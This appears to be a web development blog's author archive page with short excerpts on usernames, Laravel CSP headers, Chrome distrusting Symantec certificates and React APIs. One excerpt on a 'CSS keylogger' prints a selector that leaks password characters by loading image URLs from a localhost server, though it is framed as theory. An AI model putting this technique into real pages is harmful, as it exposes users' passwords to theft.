In “Let’s talk about usernames” James Bennett – author of django-registration – digs deeper into something that at first seems simple, usernames, and how to keep ’em safe and unique. And no, you can’t make it by just doing a simple comparison. You’ll have to think of more than that if you …
Author Archives: Bramus!
Solo: A Star Wars Story, recut to The Beastie Boys’ Sabotage
Easily set Content Security Policy headers in Laravel with laravel-csp
Speaking of Content Security Policy, the folks at Spatie – who else? – have created a Laravel Package to easily take care of your CSP needs in a Laravel-based app. Even without knowing the inner workings of the package, the custom Policy below is easy to understand: namespace App\Services\Csp; use Spatie\Csp\Directive; use Spatie\Csp\Policies\Policy as BasePolicy; …
CSS Keylogger (and why you shouldn’t worry about it)
By leveraging CSS attribute selectors it is – in theory – possible to write a keylogger in pure CSS. The selector below for example targets all input[type="password"] elements whose last character is an a: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } The theory goes that whenever a user presses the a character inside an input[type="password"], a request to …
Chrome 66 to Untrust Symantec-issued Certificates
Chrome is really tightening up the security game here. In Chrome 66 it will untrust Symantec-issued SSL/TLS certificates, after Symantec has repeatedly screwed up by wrongly issuing certificates for domains, including google.com itself. Thanks to a decision in September by Google to stop trusting Symantec-issued SSL/TLS certs, from mid-April Chrome browser users visiting websites using …
React Native and iPhone X: <SafeAreaView />
One of the elements that shipped with React 0.50 is <SafeAreaView />. It’s a component which you can use to prevent your content from creeping below The Notch and Home Indicator on iPhone X. import { // … SafeAreaView } from 'react-native'; class Main extends React.Component { render() { return ( <SafeAreaView style={styles.safeArea}> <App /> …
Proton Native – Create Native Desktop Applications Powered by React
Unlike Electron this one results in true Native Components being outputted. Proton Native does the same to desktop that React Native did to mobile. Build cross-platform apps for the desktop, all while never leaving the React eco-system. Popular React packages such as Redux still work. import React, { Component } from 'react'; import { render, …
React’s new context (React 16.3.0)
One of the new things in React 16.3.0 is a new context API: Typically, data in a React application is passed top-down (parent to child) via props. But sometimes it’s useful to pass values through multiple levels of abstraction without involving each intermediate. Examples include a locale, or a UI theme. Context in React provides …